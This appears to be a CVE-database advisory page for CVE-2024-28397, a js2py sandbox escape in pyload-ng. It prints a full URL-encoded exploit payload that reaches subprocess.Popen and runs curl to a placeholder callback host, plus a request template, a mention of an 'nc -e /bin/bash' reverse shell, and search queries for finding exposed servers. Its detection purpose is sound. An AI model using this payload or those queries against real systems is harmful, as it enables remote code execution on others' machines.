cbcvebase.
CVE-2024-28397
published 2024-06-20

CVE-2024-28397: An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.

PriorityP342medium5.3CVSS 3.1
AVLACLPRLUINSUCLILAL
EXPLOIT
EPSS
4.55%
90.4th percentile
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.

Affected

1 ranges
VendorProductVersion rangeFixed in
pyload-ng_projectpyload-ng0 – 0.5.0b3.dev85

Detection & IOCsextracted from sources · hover to see the quote

url/flash/addcrypted2
path/flash/addcrypted2
commandpackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A
sigma
id: CVE-2024-28397
info:
  name: pyload-ng js2py - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
http:
- raw:
  - |-
    POST /flash/addcrypted2 HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded
    
    package=pkg&crypted=MTIzNA%3D%3D&jk=...
  • Exploit targets the /flash/addcrypted2 POST endpoint; detect POST requests to this path from non-localhost sources, especially with a manipulated Host header.
  • A successful exploit response contains the string 'Could not decrypt key' with HTTP 500; use this as a confirmation matcher alongside DNS/OOB callback detection.
  • Shodan/FOFA/Google queries can identify exposed pyload instances: search for http.html:"pyload", body="pyload", intitle:"pyload", or app="pyLoad".
  • The exploit uses `nc -e /bin/bash` for reverse shell delivery; monitor for subprocess spawning from the pyload process with netcat or /bin/bash as child processes.
  • ·The /flash/addcrypted2 endpoint is intended to only accept localhost connections; the bypass relies entirely on Host header manipulation, so perimeter controls that trust the Host header will be ineffective.
  • ·No patch exists for js2py as of the time of writing; version 0.74 (released Nov 6, 2022) is the latest and remains vulnerable.
  • ·Calling js2py.disable_pyimport() does NOT fully sandbox the environment; attackers can still obtain a Python object reference and escape the sandbox via the class hierarchy traversal technique.

CVSS provenance

nvdv3.15.3MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
ghsa5.3MEDIUM
osv5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.